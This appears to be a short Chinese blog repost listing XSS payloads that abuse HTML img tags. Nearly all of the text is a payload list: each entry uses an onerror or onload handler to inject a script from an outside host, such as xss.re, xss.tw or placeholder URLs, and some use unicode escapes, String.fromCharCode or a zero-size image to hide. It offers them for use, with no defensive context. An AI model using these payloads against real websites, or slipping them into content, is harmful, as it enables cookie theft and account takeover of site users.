首页 > 其他 > 详细

Xss里img标签的一些利用

时间:2014-02-06 01:35:17      阅读:3614      评论:0      收藏:0      [点我收藏+]
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
<img src=1 onerror=jQuery.getScript("//xss.re/974")> 
<img src="#" onerror="$.getScript(‘\u002f\u002fxss.tw\u002f4091‘)">
<img src="#" onerror="var a=String.fromCharCode(47);$.getScript(a+a+‘xss.tw‘+a+‘4091‘)">
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" onload="s=document.createElement(‘script‘);s.src=‘http://xx‘+Math.random();document.body.appendChild(s)" border="0">
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
<img src=x onerror="with(document)body.appendChild(createElement(‘script‘)).src=‘http://xss.tw/4814‘" width="0" height="0"></img>

Xss里img标签的一些利用

原文:http://www.cnblogs.com/hookjoy/p/3538487.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!